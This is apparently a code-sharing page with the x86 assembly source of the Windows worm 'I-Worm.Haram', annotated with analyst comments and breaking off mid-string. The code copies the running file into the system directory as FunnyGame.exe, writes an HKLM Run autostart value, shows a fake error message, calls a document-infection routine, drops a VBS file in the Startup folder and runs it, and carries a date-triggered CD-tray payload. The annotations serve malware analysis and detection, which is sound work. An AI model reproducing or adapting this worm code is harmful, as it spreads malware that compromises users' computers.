
📄 haram.asm

📁 此為病毒源碼
💻 ASM


.586p
.model flat
.code

JUMPS

include win32api.inc

; ASCII control-character constants.
LF      equ     10		; line feed
CR      equ     13		; carriage return
CRLF    equ     <13,10>		; text equate: CR,LF byte pair

; @pushsz "text" -- leave a pointer to an inline NUL-terminated string on the
; stack, as if `push offset string` had been written.
;
; How it works: the CALL pushes the address of the byte that follows it (the
; first byte of the db data) as its return address and transfers control to
; next_instr, which is placed right after the string's terminating 0. No RET
; is executed, so the "return address" stays on the stack as the argument.
;
; A second macro argument is rejected at assembly time (%out message + .err).
;
; NOTE(analysis): every string emitted this way is embedded in the code stream
; between instructions. A linear-sweep disassembler will decode those bytes as
; instructions; the text itself is stored unencoded by this macro.
@pushsz         macro   msg2psh, empty
                local   next_instr
                ifnb    <empty>
                %out    too much arguments in macro '@pushsz'
                .err
                endif
                call    next_instr
                db      msg2psh,0
    next_instr:
endm

; @endsz -- advance ESI past the end of the NUL-terminated string it points to.
; In:    esi = pointer into a string
; Out:   esi = address of the byte after the terminating 0 (lodsb consumes the 0
;        before the loop exits)
; Clobb: al, flags
; NOTE(review): the scan direction follows the direction flag; forward scanning
; assumes DF is clear -- nothing in the macro sets it.
@endsz  	macro
	        local   nxtchr
	nxtchr: lodsb
	        test    al,al
	        jnz     nxtchr
endm

; api <name> -- declare <name> as an external procedure and call it.
; Arguments must already have been pushed by the caller (the call sites on this
; page push them right-to-left before invoking the macro). The extrn
; declaration is repeated at every use of the macro.
api	macro a
	extrn a:proc
	call a
endm

; Local declaration of a file-search record; the field names follow the Win32
; WIN32_FIND_DATA structure. Declared size: 4 + 3*8 + 4 + 4 + 8 + 260 + 14 + 2
; = 320 bytes. No use of this structure is visible on this page.
WIN32_FIND_DATA		struct
dwFileAttributes	dd 0			; file attribute flags
ftCreationTime		dd ?,?			; 64-bit timestamp as two dwords
ftLastAccessTime	dd ?,?			; 64-bit timestamp as two dwords
ftLastWriteTime		dd ?,?			; 64-bit timestamp as two dwords
nFileSizeHigh		dd 0			; high dword of the file size
nFileSizeLow		dd 0			; low dword of the file size
dwReserved0		dd 0,0			; two dwords under one name (reserved fields)
cFileName		db 260 dup(0)		; file name buffer, 260 bytes
cAlternateFileName	db 14  dup(0)		; alternate (short) name buffer, 14 bytes
			db  2  dup (0)		; unnamed padding, brings the total to 320 bytes
WIN32_FIND_DATA		ends

; Local declaration of a process-list record; the field names follow the
; Toolhelp32 PROCESSENTRY32 structure. Declared size: 9 dwords + 260 bytes
; = 296 bytes. The code that enumerates processes with it is not on this page
; (presumably hide_worm or a later routine -- confirm in the full source).
PROCESSENTRY32 STRUCT
       dwSize              DWORD ?		; size of this structure, filled in by the caller
       cntUsage            DWORD ?
       th32ProcessID       DWORD ?		; process identifier
       th32DefaultHeapID   DWORD ?
       th32ModuleID        DWORD ?
       cntThreads          DWORD ?		; thread count
       th32ParentProcessID DWORD ?		; parent process identifier
       pcPriClassBase      DWORD ?
       dwFlags             DWORD ?
       szExeFile           db 260 dup(?)	; executable name buffer, 260 bytes
PROCESSENTRY32 ENDS

; Program entry point.
; Saves all general-purpose registers, then expands @SEH_SetupFrame with
; `jmp end_worm` as its argument. The macro is not defined on this page
; (presumably it comes from the include file).
; NOTE(analysis): this looks like a structured-exception frame whose handler
; diverts any fault to end_worm, i.e. the sample exits quietly instead of
; crashing visibly -- confirm against the macro definition.
start:	pushad
	@SEH_SetupFrame		<jmp end_worm>

; hide_worm is defined outside this page; its behaviour cannot be stated here.
hide_the_worm:
	call hide_worm

; GetModuleFileNameA(hModule = 0, lpFilename = orgwrm, nSize = 50)
; Stores the path of the running executable in orgwrm. ESI keeps pointing at
; orgwrm for the calls that follow. The buffer limit passed is 50 characters.
get_name:
	push	50
	mov	esi,offset orgwrm
	push	esi
	push	0
	api	GetModuleFileNameA

; Build the destination path in cpywrm:
;   GetSystemDirectoryA(lpBuffer = cpywrm, uSize = 50), then append a file name.
; The first `push edi` saves the buffer start; it is restored by the final
; `pop edi`, so EDI points at the beginning of the finished path afterwards.
; `add edi,eax` moves to the end of the directory string (EAX = the returned
; length). The four dword constants are character literals written in reverse
; so that, stored little-endian, they read "\Fun" "nyGa" "me.e" "xe",0,0 --
; i.e. the suffix "\FunnyGame.exe".
; NOTE(detection): a file named FunnyGame.exe in the Windows system directory
; is a host indicator for this sample.
get_copy_name:
	mov	edi,offset cpywrm
	push	edi
	push	50
	push	edi
	api	GetSystemDirectoryA
	add	edi,eax
	mov	eax,'nuF\'
	stosd
	mov	eax,'aGyn'
	stosd
	mov	eax,'e.em'
	stosd
	mov	eax,'ex'
	stosd
	pop	edi

; CopyFileA(lpExisting = esi (orgwrm), lpNew = edi (cpywrm), bFailIfExists = 1)
; CopyFileA returns zero on failure, so `je ok_copy` is taken when the copy did
; NOT happen -- with bFailIfExists = 1 that includes the case where the
; destination file already exists. The fall-through path below therefore runs
; only when a fresh copy was just written.
copy_worm:
	push	1
	push	edi
	push	esi
	api	CopyFileA
	test	eax,eax
	je	ok_copy

; SHSetValueA(hkey = 80000002h, subkey = "...\CurrentVersion\Run",
;             value = "Haram", dwType = 1, pvData = edi (cpywrm), cbData = 50)
; 80000002h is HKEY_LOCAL_MACHINE and type 1 is REG_SZ: the copied file's path
; is written as an autostart entry.
; NOTE(detection): the value name "Haram" under
; HKLM\Software\Microsoft\Windows\CurrentVersion\Run is a registry indicator
; for this sample; the data is the path built in get_copy_name.
	push	50
	push	edi
	push	1
	@pushsz "Haram"
	@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
	push	80000002h
	api	SHSetValueA

; GetFileTitleA(lpszFile = esi (orgwrm), lpszTitle = msgwrm, cbBuf = 50)
; puts the running file's display name in msgwrm, which is then used as the
; caption of an error-style message box:
; MessageBoxA(hWnd = 0, lpText = "ERROR : ...", lpCaption = msgwrm, uType = 10h)
; 10h selects the stop/error icon. The text is a decoy shown to the user on the
; run that performed the copy; it is not raised by any real validation here.
	push	50
	push	offset msgwrm
	push	esi
	api	GetFileTitleA
	push	10h
	push	offset msgwrm
	@pushsz "ERROR : this file is not a valid Win32 file."
	push	0
	api	MessageBoxA
ok_copy:

; inf_doc_personal is defined outside this page; only the call is visible.
call	inf_doc_personal

; SHGetSpecialFolderPathA(hwnd = 0, pszPath = startup, csidl = 7, fCreate = 0)
; CSIDL 7 is the current user's Startup folder. The process then makes that
; folder its current directory, so the relative file name used below lands
; there.
get_startup_path:
	push	0
	push	7
	push	offset startup
	push	0
	api	SHGetSpecialFolderPathA
	push	offset startup
	api	SetCurrentDirectoryA

; cr_vbsname is defined outside this page; presumably it fills the vbsname
; buffer used next -- confirm in the full source.
call	cr_vbsname

	mov	edi,offset vbsname

; CreateFileA(lpFileName = edi (vbsname), dwDesiredAccess = 40000000h,
;             dwShareMode = 1, lpSecurity = 0, dwCreationDisposition = 2,
;             dwFlagsAndAttributes = 1, hTemplate = 0)
; 40000000h = GENERIC_WRITE, share 1 = FILE_SHARE_READ, disposition 2 =
; CREATE_ALWAYS (an existing file is overwritten), attribute 1 =
; FILE_ATTRIBUTE_READONLY. The handle is kept in EBP.
	push	0
	push	1
	push	2
	push	0
	push	1
	push	40000000h
	push	edi
	api	CreateFileA
	mov	ebp,eax
; WriteFile(hFile = ebp, lpBuffer = s_vbs, nBytes = e_vbs - s_vbs,
;           lpWritten = byte_write, lpOverlapped = 0)
; Writes the bytes between the labels s_vbs and e_vbs (defined outside this
; page) to the new file, then closes the handle.
	push	0
	push	offset byte_write
	push	e_vbs - s_vbs
	push	offset s_vbs
	push	ebp
	api	WriteFile
	push	ebp
	api	CloseHandle

; WinExec(lpCmdLine = wscript, uCmdShow = 1)
; The command line in `wscript` is defined outside this page; presumably it
; launches the script host on the file just written -- confirm.
; NOTE(detection): the visible sequence is a read-only file created in the
; user's Startup folder by a process that then starts a child process with
; WinExec; both events are observable in file-system and process telemetry.
	push  	1
	push	offset wscript
	api	WinExec

payload:
	mov	eax,offset sysTime
	push	eax
	api	GetSystemTime
	lea	eax,sysTime
	cmp	word ptr [eax+6],10
	jne	end_payload

	xor	eax,eax
	push	eax
	push	eax
	push	eax
	@pushsz "set CDAudio door open"
	api	mciSendStringA

	push	500
	api	Sleep

	xor	eax,eax
	push	eax
	push	eax
	push	eax
	@pushsz "set CDAudio door closed"
	api	mciSendStringA

	push	40h
	@pushsz "I-Worm.Haram"
	@pushsz "Coded by PetiK - 
